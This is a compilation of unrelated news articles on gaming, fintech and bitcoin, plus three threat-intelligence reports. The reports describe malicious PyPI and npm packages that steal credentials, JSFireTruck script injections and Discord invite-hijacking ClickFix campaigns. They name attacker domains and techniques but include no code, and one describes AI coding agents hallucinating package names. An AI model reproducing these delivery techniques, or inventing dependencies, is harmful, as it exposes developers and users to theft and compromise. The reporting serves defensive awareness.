bitcoin, Donald Trump, US bitcoin mining, tariffs, cryptocurrency, economic ambitions, mining capital, blockchain technology, digital currency, American economy ## Introduction In a world increasingly driven by technology and innovation, the dream of an all-American Bitcoin stands as a beacon of hope for many. President Donald Trump once envisioned the United States as the undisputed capital...

With the ongoing jobs cuts across the gaming industry, the shift of “Grand Theft Auto 6” from release this fall to a launch next spring, and the distraction of the first new Nintendo console in eight years, there was a chance that Summer Game Fest 2025 wouldn’t have the same allure as the annual video game showcase has had in years past. (There was also the factor of the actors strike against video game companies, which, as of June 11, has been called off by SAG-AFTRA.) Related Stories But the gamers came out in full force for the Geoff Keighley-hosted event on June 6, which live-streamed out of the YouTube Theater at SoFi Stadium in Los Angeles. Popular on Variety “Viewership was up significantly year over year,” Keighley told Variety. “Stream charts said it doubled its audience year over year for the peak concurrency to over 3 million peak concurrent viewers, which does not include China.” In person, both the Summer Game Fest live showcase event and its subsequent weekend Play Days event for developers and press saw “significantly higher” media creator attendance this year: more than 600 registered attendees vs. “somewhere in the 400s” in 2024, per SGF. The boost is an indicator that both the current U.S. political climate and significant changes in 2025’s game release schedule, like the delay of “Grand Theft Auto 6” until next May, didn’t affect interest in the event. “Things happen in the industry all the time that are big news worthy happenings,” Summer Game Fest producer and iam8bit co-creator Amanda White. “Switch 2 just happened and we’re here, it’s all working out, everybody’s having a great time playing games. It’s not irrelevant — it’s just part of the way things go.” As big a hit as the Switch 2 was with consumers upon release — selling more than 3.5 million units during the first four days after its June 5 launch — and noted multiple times during the Summer Game Fest live showcase on June 6, Nintendo’s new console was not the star of the three-day Play Days event for developers and media in Downtown Los Angeles, which ran June 7-9. “I have not seen a single attendee with a Switch 2 on campus,” SGF producer and iam8bit co-creator Jon M. Gibson said with a laugh. “There’s a few Switch 2s that Nintendo supplied. Some dev kits for Bandai and for Capcom. Of course, the launch happened on Thursday, so bandwidth from Nintendo is stretched thin with all the midnight launches and stuff. But they’re really supportive and supply some for some pre-release games, which is exciting.” Some big video publishers such as EA, Take-Two and Ubisoft skipped this year’s SGF, eliminating potential splashy in-show hits for eagerly anticipated games like “Grand Theft Auto 6.” But SGF still managed a few big moments, like the announcement and trailer release for “Resident Evil Requiem.” Gibson and White attribute that reveal and other moments like it to the immense trust the festival has managed to build up with video game publishers in just a few years. “We are very proud of our ability to keep the trust of all the publishers on campus,” Gibson said. “Six years into SGF as a whole, four years into Play Days, we’re very good. Because we have to print everything ahead of time, too. So there are lots of unannounced things that we’re very careful about who sees what. We have vendors who print and produce and manufacture physical objects under very tight wraps. We’re just very protective, because we know what it means to have to keep a secret because we’ve had our own games that we’ve had to announce, as well. Capcom is a great example with ‘Resident Evil.’ We knew that for a very long time, but they trusted us with information, and we were very careful about what our team actually knew what was going on.” And even though some of the gaming giants sat this year out, White says conversations were already happening on the Play Days campus about who is ready to return next year and what they’ll bring. “People get excited, they come and see. And each year we grow, so people see more potential,” White said. As for next year, the June show will take place just a few weeks after the planned May 26 release for “GTA 6.” While Switch 2 didn’t seem to distract too much, will the draw of playing the newly launched “GTA 6” prove to be so powerful it outshines whatever could be announced at SGF 2026? “My view is that all boats rise with ‘GTA’ launch,” Keighley said. “It is a singular cultural event that is the biggest thing in all of entertainment this decade. It will bring more people into gaming, sell lots of consoles and bring back lapsed gamers. There will never be a better time to feel the excitement and energy around gaming than SGF 2026.” See more from Variety‘s Q&A with Keighley about Summer Game Fest 2025 below. How was this year’s show impacted by the date shift for “GTA 6”? How much was planned before and after that big announcement? So far as I know there wasn’t any material impact, but I think the date move did allow a number of teams to feel more confident announcing their launch dates. Halfway through the year, what do you see as some of the biggest trends in gaming for 2025, and how did you look to reflect that in the show? We continue to see some of the most interesting and successful games come from smaller teams outside of the traditional publisher system – games like “Clair Obscur,” “Blue Prince” and “REPO.” So we wanted to highlight some of those projects at the show like “Ill” and “Mortal Shell 2.” What game announcements and trailers do you think resonated most with audiences after this show? What assets were the most popular? “Resident Evil Requiem” was a massive moment. Also we saw a lot of love for “Ill” from a small team in Canada and Armenia.

India has been one of the top recipients of remittances in the world for more than a decade. Inward remittances jumped from $55.6 billion in 2010-11 to $118.7 billion in 2023-24, according to data from the country’s central bank. The bank projects that figure will reach $160 billion in 2029. This means there is an increasing market for digitalized banking experiences for non-resident Indians(NRIs), ranging from remittances to investing in different assets back home. Aspora (formerly Vance) is trying to build a verticalized financial experience for the Indian diaspora by keeping convenience at the center. While a lot of financial products are in its future roadmap, the company currently focuses largely on remittances. “While multiple financial products for non-resident Indians exist, they don’t know about them because there is no digital journey for them. They possibly use the same banking app as residents, which makes it harder for them to discover products catered towards them,” Garg said. In the last year, the company has grown the volume of remittances by 6x — from $400 million to $2 billion in yearly volume processed. With this growth, the company has attracted a lot of investor interest. It raised $35 million in Series A funding last December — which was previously unreported — led by Sequoia with participation from Greylock, Y Combinator, Hummingbird Ventures, and Global Founders Capital. The round pegged the company’s valuation at $150 million. In the four months following, the company tripled its transaction volume, prompting investors to put in more money. The company announced today it has raised $50 million in Series B funding, co-led by Sequoia and Greylock, with Hummingbird, Quantum Light Ventures, and Y Combinator also contributing to the round. The startup said this round values the company at $500 million. The startup has raised over $99 million in funding to date. Techcrunch event Save $200+ on your TechCrunch All Stage pass Build smarter. Scale faster. Connect deeper. Join visionaries from Precursor Ventures, NEA, Index Ventures, Underscore VC, and beyond for a day packed with strategies, workshops, and meaningful connections. Save $200+ on your TechCrunch All Stage pass Build smarter. Scale faster. Connect deeper. Join visionaries from Precursor Ventures, NEA, Index Ventures, Underscore VC, and beyond for a day packed with strategies, workshops, and meaningful connections. Boston, MA | July 15 REGISTER NOW After pivoting from being Pipe.com for India, the company started by offering remittance for NRIs in the U.K. in 2023 and has expanded its presence in other markets, including Europe and the United Arab Emirates. It charges a flat fee for money transfer and offers a competitive rate. Now it also allows customers to invest in mutual funds in India. The startup markets its exchange rates as “Google rate” as customers often search for currency conversion rates, even though they may not reflect live rates. The startup is also set to launch in the U.S., one of the biggest remittance corridors to India, next month. Plus, it plans to open up shop in Canada, Singapore, and Australia by the fourth quarter of this year. Garg, who grew up in the UAE, said that remittances are just the start, and the company wants to build out more financial tools for NRIs. “We want to use remittances as a wedge and build all the financial solutions that the diaspora needs, including banking, investing, insurance, lending in the home country, and products that help them take care of their parents,” he told TechCrunch. He added that a large chunk of money that NRIs send home is for wealth creation rather than family sustenance. The startup said that 80% of its users are sending money to their own accounts back home. In the next few months, the company is launching a few products to offer more services. This month, it plans to launch a bill payment platform to let users pay for services like rent and utilities. Next month, it plans to launch fixed deposit accounts for non-resident Indians that allow them to park money in foreign currency. By the end of the year, it plans to launch a full-stack banking account for NRIs that typically takes days for users to open. While these accounts can help the diaspora maintain their tax status in India, a lot of people use a family member’s account because of the cumbersome process, and Aspora wants to simplify this. Apart from banking, the company also plans to launch a product that would help NRIs take care of their parents back home by offering regular medical checkups, emergency care coverage, and concierge services for other assistance. Besides global competitors like Remittly and Wise, the company also has India-based rivals like Abound, which was spun off from Times Internet. Sequoia’s Luciana Lixandru is confident that Aspora’s execution speed and verticalized solution will give it an edge. “Speed of execution, for me, is one of the main indicators in the early days of the future success of a company,” she told TechCrunch over a call. “Aspora moves fast, but it is also very deliberate in building corridor by corridor, which is very important in financial services.”

Jun 16, 2025Ravie LakshmananMalware / DevOps Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that's capable of harvesting sensitive developer-related information, such as credentials, configuration data, and environment variables, among others. The package, named chimera-sandbox-extensions, attracted 143 downloads and likely targets users of a service called Chimera Sandbox, which was released by Singaporean tech company Grab last August to facilitate "experimentation and development of [machine learning] solutions." The package masquerades as a helper module for Chimera Sandbox, but "aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more," JFrog security researcher Guy Korolevski said in a report published last week. Once installed, it attempts to connect to an external domain whose domain name is generated using a domain generation algorithm (DGA) in order to download and execute a next-stage payload. Specifically, the malware acquires from the domain an authentication token, which is then used to send a request to the same domain and retrieve the Python-based information stealer. The stealer malware is equipped to siphon a wide range of data from infected machines. This includes - JAMF receipts, which are records of software packages installed by Jamf Pro on managed computers Pod sandbox environment authentication tokens and git information CI/CD information from environment variables Zscaler host configuration Amazon Web Services account information and tokens Public IP address General platform, user, and host information The kind of data gathered by the malware shows that it's mainly geared towards corporate and cloud infrastructure. In addition, the extraction of JAMF receipts indicates that it's also capable of targeting Apple macOS systems. The collected information is sent via a POST request back to the same domain, after which the server assesses if the machine is a worthy target for further exploitation. However, JFrog said it was unable to obtain the payload at the time of analysis. "The targeted approach employed by this malware, along with the complexity of its multi-stage targeted payload, distinguishes it from the more generic open-source malware threats we have encountered thus far, highlighting the advancements that malicious packages have made recently," Jonathan Sar Shalom, director of threat research at JFrog Security Research team, said. "This new sophistication of malware underscores why development teams remain vigilant with updates—alongside proactive security research – to defend against emerging threats and maintain software integrity." The disclosure comes as SafeDep and Veracode detailed a number of malware-laced npm packages that are designed to execute remote code and download additional payloads. The packages in question are listed below - eslint-config-airbnb-compat (676 Downloads) ts-runtime-compat-check (1,588 Downloads) solders (983 Downloads) @mediawave/lib (386 Downloads) All the identified npm packages have since been taken down from npm, but not before they were downloaded hundreds of times from the package registry. SafeDep's analysis of eslint-config-airbnb-compat found that the JavaScript library has ts-runtime-compat-check listed as a dependency, which, in turn, contacts an external server defined in the former package ("proxy.eslint-proxy[.]site") to retrieve and execute a Base64-encoded string. The exact nature of the payload is unknown. "It implements a multi-stage remote code execution attack using a transitive dependency to hide the malicious code," SafeDep researcher Kunal Singh said. Solders, on the other hand, has been found to incorporate a post-install script in its package.json, causing the malicious code to be automatically executed as soon as the package is installed. "At first glance, it's hard to believe that this is actually valid JavaScript," the Veracode Threat Research team said. "It looks like a seemingly random collection of Japanese symbols. It turns out that this particular obfuscation scheme uses the Unicode characters as variable names and a sophisticated chain of dynamic code generation to work." Decoding the script reveals an extra layer of obfuscation, unpacking which reveals its main function: Check if the compromised machine is Windows, and if so, run a PowerShell command to retrieve a next-stage payload from a remote server ("firewall[.]tel"). This second-stage PowerShell script, also obscured, is designed to fetch a Windows batch script from another domain ("cdn.audiowave[.]org") and configures a Windows Defender Antivirus exclusion list to avoid detection. The batch script then paves the way for the execution of a .NET DLL that reaches out to a PNG image hosted on ImgBB ("i.ibb[.]co"). "[The DLL] is grabbing the last two pixels from this image and then looping through some data contained elsewhere in it," Veracode said. "It ultimately builds up in memory YET ANOTHER .NET DLL." Furthermore, the DLL is equipped to create task scheduler entries and features the ability to bypass user account control (UAC) using a combination of FodHelper.exe and programmatic identifiers (ProgIDs) to evade defenses and avoid triggering any security alerts to the user. The newly-downloaded DLL is Pulsar RAT, a "free, open-source Remote Administration Tool for Windows" and a variant of the Quasar RAT. "From a wall of Japanese characters to a RAT hidden within the pixels of a PNG file, the attacker went to extraordinary lengths to conceal their payload, nesting it a dozen layers deep to evade detection," Veracode said. "While the attacker's ultimate objective for deploying the Pulsar RAT remains unclear, the sheer complexity of this delivery mechanism is a powerful indicator of malicious intent." Crypto Malware in the Open-Source Supply Chain The findings also coincide with a report from Socket that identified credential stealers, cryptocurrency drainers, cryptojackers, and clippers as the main types of threats targeting the cryptocurrency and blockchain development ecosystem. Some of the examples of these packages include - express-dompurify and pumptoolforvolumeandcomment, which are capable of harvesting browser credentials and cryptocurrency wallet keys bs58js, which drains a victim's wallet and uses multi-hop transfers to obscure theft and frustrate forensic tracing. lsjglsjdv, asyncaiosignal, and raydium-sdk-liquidity-init, which functions as a clipper to monitor the system clipboard for cryptocurrency wallet strings and replace them with threat actor‑controlled addresses to reroute transactions to the attackers "As Web3 development converges with mainstream software engineering, the attack surface for blockchain-focused projects is expanding in both scale and complexity," Socket security researcher Kirill Boychenko said. "Financially motivated threat actors and state-sponsored groups are rapidly evolving their tactics to exploit systemic weaknesses in the software supply chain. These campaigns are iterative, persistent, and increasingly tailored to high-value targets." AI and Slopsquatting The rise of artificial intelligence (AI)-assisted coding, also called vibe coding, has unleashed another novel threat in the form of slopsquatting, where large language models (LLMs) can hallucinate non-existent but plausible package names that bad actors can weaponize to conduct supply chain attacks. Trend Micro, in a report last week, said it observed an unnamed advanced agent "confidently" cooking up a phantom Python package named starlette-reverse-proxy, only for the build process to crash with the error "module not found." However, should an adversary upload a package with the same name on the repository, it can have serious security consequences. Furthermore, the cybersecurity company noted that advanced coding agents and workflows such as Claude Code CLI, OpenAI Codex CLI, and Cursor AI with Model Context Protocol (MCP)-backed validation can help reduce, but not completely eliminate, the risk of slopsquatting. "When agents hallucinate dependencies or install unverified packages, they create an opportunity for slopsquatting attacks, in which malicious actors pre-register those same hallucinated names on public registries," security researcher Sean Park said. "While reasoning-enhanced agents can reduce the rate of phantom suggestions by approximately half, they do not eliminate them entirely. Even the vibe-coding workflow augmented with live MCP validations achieves the lowest rates of slip-through, but still misses edge cases." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Activision has included movie assassin Ballerina in the latest multiplayer version of Black Ops 6 and here they are exclusively offering Daily Star readers their top tips to become a gun heroTech17:04, 13 Jun 2025Ballerina in Call of DutyJohn Wick movie Ballerina has take over Call of Duty and the bods behind the game have given us some top tips on how to become the shooter king.The movie follows actress Ana de Armas as protagonist badass assassin Eve Macarro as she takes on all kinds of baddies alongside Keanu Reeve’s anti-hero John Wick.‌And to celebrate the silver screen success, Activision has included Eve, aka Ballerina, into Black Ops 6 as a playable online character cmplete with her own guns, finishing move and load screen as a downloadable add-on.‌But how can you, like Ana herself, become the star of mass destruction in the PS5 and Xbox game?The makers of Call of Duty have offered Daily Star readers these exclusive tips for online multiplayer mayhem in the game…Fire your guns as Ana de Armas(Image: Activision)Article continues belowEmbrace the Ruska Rogue : Don the "Ruska Rogue" Operator Skin for a sleek, black tactical look that screams stealth and deadly efficiency. Blend into the shadows and strike with calculated precision. You can adopt a minimalist, all-black approach to your loadout and Operator selection, channeling Wick's understated lethality. Remember, sometimes the most dangerous players are the ones you barely notice.Know Your Armoury : Equip the "Relevé" AK-74, "Plié" Saug, or "Arabesque" 9MM PM, all featuring High Table Coin Tracers and Death FX. Not only will you look good, but you'll also send a message: your enemies are just currency in your quest for victory . Aim for headshots to maximise your impact and conserve ammo. Use the AK-74 for mid-range engagements, the Saug for close-quarters dominance, and the 9MM PM as a reliable sidearm.‌Dance With Death, Literally (and Tactically Reload) : Master the "Dance With Death" Finishing Move. Nothing is more demoralising than eliminating an opponent with a graceful, yet brutal, execution. Use it strategically when you're sure you're safe from interruption. However, don't get caught up in the theatrics . Like Macarro, seek tactical reloads after every engagement, ensuring you're always ready for the next threat.Black Ops 6 has a fantastic multiplayer suite‌Pirouette to Victory : Utilise the "Pirouette" Emote to taunt your fallen foes (sparingly, of course!). A well-timed pirouette can tilt the mental game in your favour, especially after a clutch play. But remember, survival is paramount . Know when to disengage and reposition, just like Ballerina. A tactical retreat can be just as effective as a head-on assault.Article continues belowCharm Your Way to the Top : Equip the "Keepsake" Weapon Charm as a reminder of your mission and to add a touch of personal flair to your weapon. Small details can make a big difference in your gameplay and standing in the lobby. Furthermore, master your weapon . An assassin knows the ins and outs of every firearm he or she uses. Practice with different weapons to find what suits your play style and become proficient with it.Know Your Role (and Your Surroundings) : Just like a ballerina needs to know their choreography, understand your role on the team. Are you the aggressive fragger, the objective player, or the support specialist? Tailor your loadout and play style to maximise your contribution to the team's success. Remember, even the most elegant ballerina needs a solid foundation. Use cover, listen for footsteps, and anticipate enemy movements. Situational awareness is key to survival.

Jun 13, 2025Ravie LakshmananWeb Security / Network Security Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections. According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code. The cybersecurity company has given the technique an alternate name JSFireTruck owing to the profanity involved. "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis." Further analysis has determined that the injected code is designed to check the website referrer ("document.referrer"), which identifies the address of the web page from which a request originated. Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising. Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day. "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities." Say Hello to HelloTDS The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites. The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page. "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month. "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected." Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT (aka Emmenhtal Loader), which is known to server information stealers like Lumma. Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information. "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said. "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    

Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets." The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites. Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets. While users can create temporary, permanent, or custom (vanity) invite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases. This ability to reuse Discord expired or deleted codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim it for their malicious server. "This creates a serious risk: Users who follow previously trusted invite links (e.g., on websites, blogs, or forums) can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said. The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server. Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button. This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification. Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string" (i.e., the PowerShell command), and press Enter to authenticate their accounts. But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them. At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks. AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file. The other payload is a Golang information stealer that's downloaded from Bitbucket. It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms. Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office. The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook. The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain. Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times. It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past. "This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers." "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    